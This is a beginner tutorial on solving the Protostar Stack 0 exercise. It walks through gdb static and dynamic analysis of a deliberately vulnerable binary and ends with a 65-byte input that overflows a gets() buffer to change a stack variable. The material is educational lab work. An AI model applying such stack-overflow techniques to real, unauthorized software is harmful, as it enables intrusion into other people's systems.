Practical Reverse Engineering Tutorials Part 1: Introduction & Protostar Stack 0
Table of Contents
What is this about?#
This article is the 1st part of the Practical Reverse Engineering Tutorials series. This series is geared towards a structured, but almost completely practical, approach to learn Reverse Engineering. Many of the existing articles/books take a long winded approach to teach RE which is prefixed with a lot of theory before the reader can get their hands dirty. This series will take a different approach of picking up various challenges in the order of increasing difficulty and help the reader in exploring ways how to break them. I’ll try to keep mundane theory limited to the portions needed to beat the current challenge in consideration. Hopefully, this keeps the articles short, precise and interesting enough for readers to keep their attention span intact.
I’d like to believe that these articles will prove helpful to those who are completely new to the world of reverse engineering. But I hope that even intermediate level readers would be able to make use of these by picking up the articles according to their appropriate levels.
Pre-requisite for these articles is basic knowledge of programming concepts, prefereably C. Any kind of prior experience with any assembly language is good but not mandatory.
For any queries, suggestions or feedback, please leave a comment here or ping me @shantanugoel
Exploit Exercises / Protostar#
For the first few articles of this series, we’ll work through some of the challenges from Exploit Exercises, starting with Protostar.
Note that although most of the challenges on exploit exercises provide source code of the challenge, we’d try to hack our way using purely reverse engineering as much as possible without looking at the source code. This would lead to better learning and avoid guiding you towards the solution pre-maturely. I strongly recommend that you do not look at the C source unless you’ve completed the below artcile fully or are not able to make connection to the assembly code at all after serious effort.
Setup#
To create the setup, follow the below steps:
- Download the Protostar ISO file from https://exploit-exercises.com/download/
- Download and install VMWare Workstation Player or VirtualBox
- Create a new virtual machine in the vm software you downloaded using the nebula ISO from the first step
- The iso is a live CD, so you can boot from it directly, instead of having to install it in the VM
We’re all set now to begin
Stack 0#
Stack0 is the first challenge in protostar.
Preparing for the challenge#
The webpage says that the challenge is located at /opt/protostar/bin/stack0
, so login to the VM and run this program. It looks like it is waiting for some input. On entering any data, it seems to tell us we were wrong with a message Try again?
user@protostar:/opt/protostar/bin$ ./stack0
asd
Try again?
user@protostar:/opt/protostar/bin$
We run strings
command on the stack0 program to find out interesting text present in it, and see another one you have changed the 'modified' variable
, which seems to be our target.
user@protostar:/opt/protostar/bin$ strings stack0
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
gets
puts
__libc_start_main
GLIBC_2.0
PTRh@
[^_]
you have changed the 'modified' variabley
Try again?
user@protostar:/opt/protostar/bin$
Static Analysis#
Now that we know what we need to achieve, we start our reverse engineering by doing static analysis of the program. There are several utilities to look at the low level code of the program. However, we will be using gdb
here which can help us later in dynamic analysis as well. gdb or The GNU Project Debugger is a popular open source debugger. We’ll graduate to more powerful tools or use reverse engineering oriented plugins for gdb later, but for now a vanilla gdb will do. It is already installed in the protostar VM. A debugger allows us to examine the internal state of the program as it executes at instruction/register level.
Some of the important commands that you’d use during the static analysis for this challenge are:
set disassembly-flavor intel
: While this is optional, but it allows to see the disassembled code in a more readable format.
disassemble <function>
: This command displays the disassembled code of function
You can read more about these commands at https://sourceware.org/gdb/current/onlinedocs/gdb/ or http://visualgdb.com/gdbreference/commands/
Using the above information, we load the stack0
executable in GDB and disassemble the function main
.
user@protostar:/opt/protostar/bin$ gdb stack0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <puts@plt>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <puts@plt>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
End of assembler dump.
(gdb)
Making sense of the assembly code#
Well, so we got a….big pile of gibberish? So, this is how assembly code looks like. Very different from a regular C program, as you can see. On the left side, you can see the memory addresses where a particular instruction is present and on the right side the instruction. Each instruction is again composed of two parts:
- The instruction itself
- 0 or more operands (which can be addresses or registers with some specific formatting that we will learn as we encounter it)
Now, although this is a small enough program, as good reverse engineers, we rarely go through the whole program immediately which would require us to know each assembly instruction as well as take a lot of time. So, instead we will make some intelligent guesses and look at only the instructions/code that we really need to know. Just know these basic things before moving forward:
- Any instruction that works on some data either takes one or more addresses and/or registers as operands, which it operates on
- A register like eax is a basically a temporary/scratch memory close to the CPU for getting fast access to a data being used locally frequently
- There are few special registers. For current problem, know that ebp is the Stack Base pointer or the bottom of current stack frame, esp is the stack pointer or the current top of the stack, eip is the instruction pointer or the address of the instruction which is just about to be executed. We’ll learn more about the ebp/esp when we do a real stack overflow problem
- A square bracket
[]
around a address or register signifies that the instruction refers to the value present in that address/register as the source or destination of the operation instead of the address/register itself. - For most operations involving a source and destination operand, the left operand is the destination.
If you face problem in understanding the below information and think you need to understand x86 assembly a bit more before moving forward, you can use this very short and simple guide for the same: https://www.cs.virginia.edu/~evans/cs216/guides/x86.html
Many times, my first intuition is to find out the areas in code which lead to our success/failure cases and work backwards from there. From our preparation phase, we saw that the failure case printed a message Try again?
on the screen and the success case was potentially a message you have changed the 'modified' variable
. Skimming over the code quickly, you will notice 3 peculiar statements that you may already be familiar from your C programming.
0x0804840c <main+24>: call 0x804830c <gets@plt>
...
0x08048420 <main+44>: call 0x804832c <puts@plt>
...
0x0804842e <main+58>: call 0x804832c <puts@plt>
If you don’t remember what gets
and puts
do, you can look at their descriptions from their manpages (e.g. man puts
). In brief, gets
allows you to capture user input from stdin and puts
allows you to print output to stdout to display to the user. This matches with our observations in the previous section that it waited for user input when we ran the program and gave an error message on receiving the input. We also saw a 2nd string which was potentially the success message. So we have 1 gets and 2 puts statements corresponding to this, but we don’t know yet which one of the 2 puts statements is the success part and which one is the failure part.
Anyways, we start moving a bit backwards from the first puts statement and try to make sense of each instruction:
0x08048420 <main+44>: call 0x804832c <puts@plt>
Here, the call
instruction refers to calling a function specified by the address 0x804832c. The string inside <> is the disassembler telling you the symbol name associated with that address.
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
Here, the mov
instruction is moving the value 0x8048500 into the address pointed by the register esp. The X86 calling convention puts the arguments to a function onto the stack before calling it and here the esp is the “Stack pointer” register. So, this must be the address of the string being passed to puts that it must print. Keep this address 0x8048500 in mind for our next section (Dynamic Analysis).
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
Here we see that first we move some data from the address esp + 0x5c into eax. then the test
instruction checks whether eax is zero or not. It does this by AND’ing the left and right operand. Since eax is the left as well as the right operand, the AND result will be zero only if eax is zero. Then the je
(or jump if equal to) instruction will jump the program execution to the address 0x8048427 (i.e. it will skip the first puts statement and start executing near our 2nd puts statement) if eax was zero. Otherwise it will execute the first puts statement. It decides the “equal to” condition by looking at an internal flag called Zero Flag (or Z or ZF) and treats equals condition to be true if this flag is set. This is because a test
or a cmp
(compare) instruction will set the ZF to 1 if result of the AND of 2 operands (in case of test) or difference of 2 operands (in case of cmp) was 0.
This seems like our decision maker code as if we can manipulate the value at [esp+0x5c] then we can control the flow of the program to either of the puts statements. So, let’s keep this address in mind for our dynamic analysis.
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <gets@plt>
Finally we reach the user input call. lea
instruction means “Load effective address”. It is a slightly tricky instruction in the sense that:
- it does the calculations only on the right side operand, not both and then stores the result in left operand
- the square brackets [] don’t really refer to the meaning that we know from other instructions (i.e. you dont need to find out further the value present at calculated address and can just ignore the [])
Combining this knowledge with the semantics of mov/call that we learnt earlier, we know that the program is collecting the user input and storing that into a location starting at esp+0x1c.
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
And then we come to this instruction which looks a bit familiar to us because we’ve already seen that address esp+0x5c earlier. So, this seems like the initialization statement for a variable which is set to 0 and then later checked whether it is still 0 or not.
The vulnerability#
Our task then is to make this variable (at location esp+0x5c) 0 or non-zero depending on what do the 2 puts statements do. The only access to influence the program we have is through the input we can give to gets
. Hmm, so we dig deeper into the gets manpage and we see below:
gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed (see BUGS below).
Great! So we know that we need to update a value at address esp+0x5c and we know that we have a possibility to have unchecked writes done starting from esp+0x1c. You know where this is going, and we almost don’t even need further dynamic analysis to crack this now. But I’ll take you through a bit of dynamic analysis for a brief introduction to it and for confirming our theory.
Dynamic Analysis#
While in static analysis we carry out all our inspections without running the program, in dynamic analysis we monitor the internal state of the program while it is running. For this, we will run the program inside gdb. You should know the following basic commands for this:
r
: Run the currently loaded program from beginning
b *<address>
: Put a breakpoint at <address> so that the program stops execution when it reaches that address.
c
: Continue execution
info r
: This displays the current state of the CPU’s general purpose registers
x/<n><s> <address/register>
: This allows to examine the process memory at the given address or address contained in register. You can use various switches <s> with it to display a specific amount of memory and in a specific format. e.g., /i displays the memory as instructions, /x as hex, /s as strings, etc. The number <n> is used to display n units of memory
Now, before we run the program, recall that we had 2 puts calls in our assembly code and we didn’t know which one was the success case and which was failure. So we simply try to read the strings present at the addresses which were passed to the puts calls.
(gdb) x/s 0x8048500
0x8048500: "you have changed the 'modified' variable"
(gdb) x/s 0x8048529
0x8048529: "Try again?"
(gdb)
So we knnow that our first puts call is the success case and the second one is failure. Now, our observation was that if the value at esp+0x5c was 0, then it goes to the second puts call and otherwise it goes to first. So, we have to somehow make this value non-zero to get success.
We know that our area of interest is in the gets call through which we can manipulate the program memory. So let’s put couple of breakpoints, 1 before gets and 1 after and then run the program.
(gdb) b *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) b *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb) r
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffff864)
at stack0/stack0.c:11
11 stack0/stack0.c: No such file or directory.
in stack0/stack0.c
(gdb)
Now, we are stopped right before executing the gets call. We know that the input is taken at esp+0x1c and the target variable is located at esp+0x5c. So, let’s see the state of the program memory around these areas.
(gdb) x/30x $esp
0xbffff750: 0xbffff76c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
This shows us that the stack pointer is at 0xbffff750, the value at esp+0x1c (i.e. 0xbffff76c) is some non-zero value and the value at esp+0x5c (i.e. 0xbffff7ac) is 0 (matches the variable initialization value). Let’s continue further to the next step, enter some known data as input and see the state of memory again.
(gdb) c
Continuing.
AAAAAAAAAAAA
Breakpoint 2, main (argc=1, argv=0xbffff864) at stack0/stack0.c:13
13 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750: 0xbffff76c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0xbffff700 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
(gdb)
We entered AAAAAAAAAAAA
as the input, i.e., 12 ‘A’ characters as input and notice that 12 bytes starting from 0xbffff76c onwards now reflect as 0x41 (which is the ascii value of A). So if we enter more number of As, we can continue overwriting more memory locations with 0x41 till we reach esp+0x5c. We can find the distance between the input variable and output variable addresses by doing this simple calculation of (esp+0x5c - esp+0x1c) or (0xbffff7ac - 0xbffff76c) which comes out to be 0x40 or 64. So, we need to input more than 64 As into the program to modify the variable and get the desired result.
Try this out now on regular command line:
user@protostar:/opt/protostar/bin$ ./stack0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have changed the 'modified' variable
or if you know python
user@protostar:/opt/protostar/bin$ python -c 'print "A"*65' | ./stack0
you have changed the 'modified' variable
SUCCESS!
References / Lessons learnt#
So, in this article, we learnt:
- About a very basic buffer overflow on the stack and how to exploit it.
- Static and dynamic analysis portions of reverse engineering
- strings command
- Introduction to x86 assembly
- Several gdb commands
- We also learnt that usage of
gets
function is very dangerous as it doesn’t have any kind of check on the amount of input coming from the user versus the space we have to save it.
You can refer to the below links for reading up more about some of the things discussed above. If you have any queries or suggestions, please leave a comment here or ping me @shantanugoel